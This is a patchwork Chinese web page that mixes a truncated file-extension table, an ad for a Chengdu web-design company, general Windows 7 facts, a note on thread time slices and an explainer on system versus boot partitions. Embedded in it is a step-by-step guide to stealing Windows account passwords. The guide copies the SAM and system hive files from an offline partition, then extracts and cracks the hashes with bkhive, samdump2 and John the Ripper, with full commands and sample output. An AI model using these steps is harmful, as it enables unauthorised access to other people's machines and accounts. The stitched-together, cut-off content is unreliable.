常用文件扩展名的相应文件类型及用途扩展名文件类型用途.A01,2使用ARJ的分片压缩功能得到的文件用在ARJ连续解压.AIF苹果机的波型声音文件QuickTime等多媒体播放程序可播放.AMG系统映像文件Actor系统使用.APP应用程序文件数据库内使用.ARJARJ压缩文件ARJ可解压.ASCASCII码的文本文件DOS下直接列出,文本编辑程序可调用.ASM汇编语言源程序文件相应语言编译成可执行文件.AVI压缩影像、动画文件微软的多媒体播放程序可播放.BAK备份文件.BASBASIC语言源程序文件可编译成可执行文件.BAT批处理文件操作系统或应用程序下直接执行.BIN二进制文件文本编辑类程序可调用.BMPWindows环境下的位图文件Windows下或相应的看图程序可调用.CC语言源程序文件C语言程序下编译使用.CAB微软格式的压缩包文件微软的安装程序可解压安装.CDACD音轨文件CD播放程序可播放.CFG含系统设备和环境信息的配置文件文本类编辑程序可调阅.CHK由CHKDSK/F所恢复的数据文件磁盘管理工具使用.CIL网络下载包文件网络操作系统可解压.CLPWindows剪贴板产生的文件Windows系统或图形编辑类程序可调用.CLSBASIC语言库文件BASIC语言环境使用.CMD含DBASE程序的命令文件DBASE数据库使用.CMF声霸卡标准的音乐文件FM合成器可回放.CNF设备配置信息文件应用程序使用.COBCOBOL语言源程序文件相应语言下编译.COM可执行命令文件操作系统或应用程序下直接执行.CPL控制面板扩展文件Windows操作系统使用.CURWindows的光标文件Windows系统下使用.CUT图形文件图形编辑类程序可调用.DAT1.数据文件2.VCD中的图像声音文件应用程序使用VCD播放软件可调用.DB含系统运行环境参数的配置文件DBASE数据库使用.DBD演示数据文件.DBF数据库文件数据库系统使用.DBS帮助信息文件数据库系统使用.DBT数据库备注文件数据库系统使用.DCX图形文件图形编辑类程序可调用.DDI映像文件DUP、HD、IMG等工具可.DEF模式定义文件磁盘映像文件Windows系统使用DEF程序可解开.DEM程序的演示数据文件多种应用程序使用.DEV设备驱动器文件含Config.sys参数.DGS设备诊断文件DOS操作系统使用.DIB动画或图片文件看图工具或多媒体播放工具可调用.DIF数据交换格式文件程序中用于不同系统之间的数据交换.DIR目录文件部分应用程序使用.DLL动态连接的链接库文件Windows系统的应用程序使用.DOC文档文件Windows的Word文档.DOTWord的模式文件Windows的Word模板.DRV设备驱动程序操作系统下执行安装.DWC压缩文件相应解压工具可解压.DVPAutoCAD的设备参数文件AutoCAD系统使用.DWGAutoCAD的绘图示范文件AutoCAD系统使用.DXFAutoCAD的图形交换文件AutoCAD系统使用.DXXAutoCAD的属性析取文件AutoCAD系统使用.ERR编译错误信息文件编译系统下使用或文本编辑程序调用.EXE可执行的程序命令文件操作系统下直接执行.FKY宏文件Foxpro数据库使用.FLC动画文
成都创新互联从2013年创立,是专业互联网技术服务公司,拥有项目成都做网站、网站设计网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元浈江做网站,已为上家服务,为浈江各地企业和个人服务,联系电话:13518219792
用linux启动,并挂载Windows的系统分区把c:windowssystem32config目录下的'SAM和system复制出来,也可以用WINPE,DOS引导盘,都可以的,只要把SAM和system复制出来就行
开始破解:
bkhive system keys ——生成keys文件
samdump2 SAM keys hashes ——用SAM和keys生成hashes
john hashes ——跑hashes
现在没有在linux下,改天上图,下面我文字描述一下
mount -t ntfs /dev/hda1 /mnt/windows
mkdir /home/young001/sam
cp /mnt/windows/WINDOWSsystem32config/SAM /home/young001/sam
cp /mnt/windows/WINDOWSsystem32config/system /home/young001/sam
unount /mnt/windows
cd /home/young001/sam
bkhive system keys
samdump2 SAM keys hashes
john hashes ——跑hashes
这样密码揪出来了
另外加上一些提示:
比如administrator密码是123456,那么他会在最底下这么显示
administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666:::看起来有点像/etc/passwd的内容格式,如果当时没有看清楚密码就清屏了,或者后来忘记已经破解了的密码,可以通过下面命令查看
john-1.7.2/run/john -show hashes有的时候密码处有可能会显示几个问号,如下
administrator:456:500:e263f50a6a506be3d494d3d62b4dc666:::这个时候可以通过
john-1.7.2/run/john -show hashes看看密码是否完整。 如果还是不完整,那么可能密码没有完全破解完毕,可以加–restore 参数从原来基础上继续破解
john-1.7.2/run/john ——restore hashes
要安装windows7系统磁盘分区必须为NTFS格式。
Windows7是微软公司于2009年10月22日推出的一个电脑操作系统,供个人、家庭及商业使用,一般安装于桌上型电脑、笔记本电脑、平板电脑、多媒体中心等设备上,它曾是市场占有率最高的操作系统之一。
Windows7具有互联网搜索、应用文本搜索、Aero玻璃特效、多点触控、数据保护、远程桌面、计算器、Windows防火墙等服务功能。Windows7的设计主要围绕五个重点——针对笔记本电脑的特有设计;基于应用服务的设计;用户的个性化;视听娱乐的优化;用户易用性的新引擎。跳跃列表,系统故障快速修复等,这些新功能令Windows7成为最易用的Windows。
Windows7简化了许多设计,如快速最大化,窗口半屏显示,跳转列表(JumpList),系统故障快速修复等。Windows7的小工具并没有了像WindowsVista的侧边栏,这样,小工具可以单独在桌面上放置。2012年9月,微软停止了对Windows7小工具下载的技术支持,原因是因为Windows7和WindowsVista中的Windows边栏平台具有严重漏洞。
上下文交换的时间是极短的,系统时间分片大概是 20ms 或 10ms 左右
线程一次运行了多长时间与时间片的长度并没有太大关系,这还与当前系统中其他进程的状况有关,因为 windows 是可抢占优先级的系统,因此时间片在这个问题上不能说明问题
具体区别,还得视情况而定
微软文档中的可以(但不是必须)说明两者之间即有联系又有区别。
情况1:系统分区就是启动分区
对于系统用户,系统分区一般就是启动分区,因为引导文件和Windows目录都存在于同一位置。比如XP安装在C盘单系统用户,ntldr、boot.ini、Ntdetect.com引导文件和Windows目录都在C盘,所以这两个分区是一致的。
情况2:系统分区不是启动分区
对于c:Windows XP+d:Windows 7双系统用户,此时系统分区就不一定是启动分区了。比如当你通过Bootmgr多重启动菜单进入Windows 7,此时对于Windows 7而言,系统分区就是C盘(因为其中包含c:\bootmgr引导文件和c:\boot引导目录),启动分区则是D盘(因为该分区保存着d:\windows系统目录)。进入Windows 7后打开磁盘管理组件,可以非常清楚看到两者的不同,这也就是解释文档中但不是必须的实例解读。
对于一些品牌机或者使用Windows 7安装光盘全新安装系统的用户,由于这此电脑的C盘前还存在隐藏分区,隐藏分区负责保存系统引导文件,因此系统分区也不是启动分区。别轻易碰系统分区。
清楚了系统分区,启动分区的联系与区别,就很容易对付一些常见启动故障了。比如,对于c:Windows XP+D:Windows 7双系统用户,如果对C盘进行格式化重装XP后就无法进入Windows 7.因为对于Windows 7来说,格式化C盘后就破坏了其系统分区,自然无法进行成功地引导。
系统分区担负系统引导功能,如果该分区文件丢失就会告成系统无法引导。比如对于XP用户,如果丢失ntldr引导文件,开机就会出现ntldr is missing(ntldr文件丢失)提示。常规修复方法是添加启动文件,或对启动配置(比如Windows 7下BCD文件)进行重新编辑。启动分区则是系统核心文件、系统初始化、核心加载、驱动配置、系统服务管理都是基于该分区文件的存在。
系统分区、启动分区、主分区、逻辑分区有何区别?
前两个是针对操作系统而言,主要是从功能上划分的概念,后两个则是针对磁盘分区类型划分的。系统分区具备引导功能,一般就是活动的主分区,启动分区则可以是主分区或逻辑分区(主要看该分区是否存放Windows目录)。